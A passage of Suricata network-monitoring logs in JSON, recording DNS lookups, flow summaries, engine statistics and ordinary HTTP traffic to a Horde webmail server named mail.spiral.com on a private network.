cp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2371,"failed_udp":112},"tx":{"http":4702,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2451}},"flow_mgr":{"closed_pruned":2777,"new_pruned":15,"est_pruned":2421,"bypassed_pruned":0,"flows_checked":4,"flows_notimeout":1,"flows_timeout":3,"flows_timeout_inuse":0,"flows_removed":3,"rows_checked":65536,"rows_skipped":65531,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20827,"memcap_state":0,"memcap_global":0},"http":{"memuse":154227,"memcap":0}}} 
{"timestamp":"2020-02-29T00:16:43.001275+0000","flow_id":921415108703488,"event_type":"flow","src_ip":"192.168.10.122","src_port":59394,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:11:42.767232+0000","end":"2020-02-29T00:11:42.875378+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:43.634753+0000","flow_id":101213813529097,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34858,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/add.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":18989},"app_proto":"http","fileinfo":{"filename":"\/turba\/add.php","state":"TRUNCATED","stored":false,"size":106496,"tx_id":0}} {"timestamp":"2020-02-29T00:16:44.041696+0000","flow_id":1224712834032352,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":33837,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":4784,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:44.146676+0000","flow_id":1224712834032352,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33837,"proto":"UDP","dns":{"type":"answer","id":4784,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:16:44.146676+0000","flow_id":1224712834032352,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33837,"proto":"UDP","dns":{"type":"answer","id":4784,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:16:44.262516+0000","flow_id":1932166962086260,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":39917,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":13646,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:44.370968+0000","flow_id":1932166962086260,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39917,"proto":"UDP","dns":{"type":"answer","id":13646,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:16:44.370968+0000","flow_id":1932166962086260,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39917,"proto":"UDP","dns":{"type":"answer","id":13646,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:16:47.177191+0000","flow_id":1731686478885927,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":53483,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":28552,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:47.282104+0000","flow_id":1731686478885927,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53483,"proto":"UDP","dns":{"type":"answer","id":28552,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:16:47.282104+0000","flow_id":1731686478885927,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53483,"proto":"UDP","dns":{"type":"answer","id":28552,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:16:47.299997+0000","flow_id":363769459871467,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34860,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":45}} {"timestamp":"2020-02-29T00:16:47.299997+0000","flow_id":363769459871467,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34860,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":45},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":16,"tx_id":0}} 
{"timestamp":"2020-02-29T00:16:49.000487+0000","flow_id":223250995218985,"event_type":"flow","src_ip":"192.168.10.122","src_port":58990,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:11:48.199209+0000","end":"2020-02-29T00:11:48.307119+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:49.880408+0000","flow_id":1781907531591448,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45792,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64725,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:49.985303+0000","flow_id":1781907531591448,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45792,"proto":"UDP","dns":{"type":"answer","id":64725,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:16:49.985303+0000","flow_id":1781907531591448,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45792,"proto":"UDP","dns":{"type":"answer","id":64725,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:16:50.000174+0000","event_type":"stats","stats":{"uptime":14662,"capture":{"kernel_packets":136226,"kernel_drops":0},"decoder":{"pkts":136232,"bytes":93672396,"invalid":189,"ipv4":134712,"ipv6":9,"ethernet":136232,"raw":0,"null":0,"sll":0,"tcp":129318,"udp":5190,"sctp":0,"icmpv4":15,"icmpv6":9,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097632},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2800,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2816,"synack":2807,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":144,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1838,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":104,"dcerpc_udp":0,"dns_udp":2374,"failed_udp":112},"tx":{"http":4703,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2454}},"flow_mgr":{"closed_pruned":2777,"new_pruned":15,"est_pruned":2423,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":3,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21489,"memcap_state":0,"memcap_global":0},"http":{"memuse":41010,"memcap":0}}} 
{"timestamp":"2020-02-29T00:16:50.079654+0000","flow_id":607027817694435,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34862,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/turba\/add.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/add.php","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=oZ_HnvDV1RzcsAiiL_PzNnX&view=Contact","length":20}} {"timestamp":"2020-02-29T00:16:50.089117+0000","flow_id":1807681630395421,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":57626,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":16564,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:50.197597+0000","flow_id":1807681630395421,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57626,"proto":"UDP","dns":{"type":"answer","id":16564,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:16:50.197597+0000","flow_id":1807681630395421,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57626,"proto":"UDP","dns":{"type":"answer","id":16564,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:16:52.000170+0000","flow_id":413251773933581,"event_type":"flow","src_ip":"192.168.10.130","src_port":34844,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":9,"bytes_toserver":1155,"bytes_toclient":7733,"start":"2020-02-29T00:15:44.862221+0000","end":"2020-02-29T00:15:50.145157+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:16:52.301543+0000","flow_id":363769459871467,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34860,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":45},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":27,"tx_id":0}} {"timestamp":"2020-02-29T00:16:53.000301+0000","flow_id":862814588722720,"event_type":"flow","src_ip":"192.168.10.130","src_port":34842,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":1210,"bytes_toclient":890,"start":"2020-02-29T00:15:13.613920+0000","end":"2020-02-29T00:15:52.465705+0000","age":39,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:16:53.000509+0000","flow_id":447486943095378,"event_type":"flow","src_ip":"192.168.10.122","src_port":40980,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:11:52.846418+0000","end":"2020-02-29T00:11:52.954641+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:53.000898+0000","flow_id":2078036930179823,"event_type":"flow","src_ip":"192.168.10.130","src_port":34840,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":28,"pkts_toclient":34,"bytes_toserver":4469,"bytes_toclient":36316,"start":"2020-02-29T00:15:09.176879+0000","end":"2020-02-29T00:15:52.465550+0000","age":43,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:16:56.000995+0000","flow_id":623112466345782,"event_type":"flow","src_ip":"192.168.10.130","src_port":34846,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":10,"bytes_toserver":1143,"bytes_toclient":8792,"start":"2020-02-29T00:15:50.208694+0000","end":"2020-02-29T00:15:55.405377+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:16:57.000323+0000","event_type":"stats","stats":{"uptime":14669,"capture":{"kernel_packets":136283,"kernel_drops":0},"decoder":{"pkts":136286,"bytes":93702366,"invalid":191,"ipv4":134764,"ipv6":9,"ethernet":136286,"raw":0,"null":0,"sll":0,"tcp":129364,"udp":5194,"sctp":0,"icmpv4":15,"icmpv6":9,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097056},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2801,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2817,"synack":2808,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":145,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1839,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":104,"dcerpc_udp":0,"dns_udp":2376,"failed_udp":112},"tx":{"http":4704,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2456}},"flow_mgr":{"closed_pruned":2780,"new_pruned":15,"est_pruned":2425,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":3,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21490,"memcap_state":0,"memcap_global":0},"http":{"memuse":2112,"memcap":0}}} 
{"timestamp":"2020-02-29T00:16:59.002148+0000","flow_id":2200121362976242,"event_type":"flow","src_ip":"192.168.10.122","src_port":47304,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":2,"pkts_toclient":2,"bytes_toserver":172,"bytes_toclient":282,"start":"2020-02-29T00:11:57.953842+0000","end":"2020-02-29T00:11:58.181226+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:04.000248+0000","event_type":"stats","stats":{"uptime":14676,"capture":{"kernel_packets":136285,"kernel_drops":0},"decoder":{"pkts":136288,"bytes":93702498,"invalid":191,"ipv4":134766,"ipv6":9,"ethernet":136288,"raw":0,"null":0,"sll":0,"tcp":129366,"udp":5194,"sctp":0,"icmpv4":15,"icmpv6":9,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096480},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2801,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2817,"synack":2808,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":145,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1839,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":104,"dcerpc_udp":0,"dns_udp":2376,"failed_udp":112},"tx":{"http":4704,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2456}},"flow_mgr":{"closed_pruned":2781,"new_pruned":15,"est_pruned":2426,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked
":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21160,"memcap_state":0,"memcap_global":0},"http":{"memuse":2112,"memcap":0}}} {"timestamp":"2020-02-29T00:17:09.000342+0000","flow_id":173927609846779,"event_type":"flow","src_ip":"fe80:0000:0000:0000:fc16:3eff:fe73:695a","dest_ip":"ff02:0000:0000:0000:0000:0000:0000:0002","proto":"IPv6-ICMP","icmp_type":133,"icmp_code":0,"flow":{"pkts_toserver":1,"pkts_toclient":0,"bytes_toserver":70,"bytes_toclient":0,"start":"2020-02-29T00:16:38.117755+0000","end":"2020-02-29T00:16:38.117755+0000","age":0,"state":"new","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:10.000893+0000","flow_id":544162378397647,"event_type":"flow","src_ip":"192.168.10.81","src_port":52762,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":11,"bytes_toserver":1157,"bytes_toclient":9925,"start":"2020-02-29T00:16:03.964559+0000","end":"2020-02-29T00:16:09.219655+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:17:11.000250+0000","event_type":"stats","stats":{"uptime":14683,"capture":{"kernel_packets":136285,"kernel_drops":0},"decoder":{"pkts":136288,"bytes":93702498,"invalid":191,"ipv4":134766,"ipv6":9,"ethernet":136288,"raw":0,"null":0,"sll":0,"tcp":129366,"udp":5194,"sctp":0,"icmpv4":15,"icmpv6":9,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096192},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2801,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2817,"synack":2808,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":145,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1839,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":104,"dcerpc_udp":0,"dns_udp":2376,"failed_udp":112},"tx":{"http":4704,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2456}},"flow_mgr":{"closed_pruned":2781,"new_pruned":15,"est_pruned":2426,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21160,"memcap_state":0,"memcap_global":0},"http":{"memuse":2032,"memcap":0}}} 
{"timestamp":"2020-02-29T00:17:14.000486+0000","flow_id":198980151024429,"event_type":"flow","src_ip":"192.168.10.130","src_port":34848,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":1102,"bytes_toclient":774,"start":"2020-02-29T00:15:52.465709+0000","end":"2020-02-29T00:16:13.631724+0000","age":21,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:17:18.000223+0000","event_type":"stats","stats":{"uptime":14690,"capture":{"kernel_packets":136285,"kernel_drops":0},"decoder":{"pkts":136288,"bytes":93702498,"invalid":191,"ipv4":134766,"ipv6":9,"ethernet":136288,"raw":0,"null":0,"sll":0,"tcp":129366,"udp":5194,"sctp":0,"icmpv4":15,"icmpv6":9,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095616},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2801,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2817,"synack":2808,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":145,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1839,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":104,"dcerpc_udp":0,"dns_udp":2376,"failed_udp":112},"tx":{"http":4704,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2456}},"flow_mgr":{"closed_pruned":2783,"new_pruned":16,"est_pruned":2426,"bypass
ed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21160,"memcap_state":0,"memcap_global":0},"http":{"memuse":1952,"memcap":0}}} {"timestamp":"2020-02-29T00:17:19.118914+0000","flow_id":1653011270062210,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":44867,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":44829,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:17:19.227917+0000","flow_id":1653011270062210,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44867,"proto":"UDP","dns":{"type":"answer","id":44829,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:17:19.227917+0000","flow_id":1653011270062210,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44867,"proto":"UDP","dns":{"type":"answer","id":44829,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:17:19.438006+0000","flow_id":2225289892430090,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52768,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8119}} 
{"timestamp":"2020-02-29T00:17:21.000492+0000","flow_id":1584978968453450,"event_type":"flow","src_ip":"192.168.10.122","src_port":54606,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:12:20.598346+0000","end":"2020-02-29T00:12:20.707223+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:21.000827+0000","flow_id":1230407958635898,"event_type":"flow","src_ip":"192.168.10.130","src_port":34850,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":1095,"bytes_toclient":725,"start":"2020-02-29T00:16:13.632186+0000","end":"2020-02-29T00:16:20.087703+0000","age":7,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:17:23.000471+0000","flow_id":1032113613812835,"event_type":"flow","src_ip":"192.168.10.81","src_port":52764,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":1143,"bytes_toclient":712,"start":"2020-02-29T00:16:17.570467+0000","end":"2020-02-29T00:16:22.723356+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:17:23.525111+0000","flow_id":2225289892430090,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52768,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
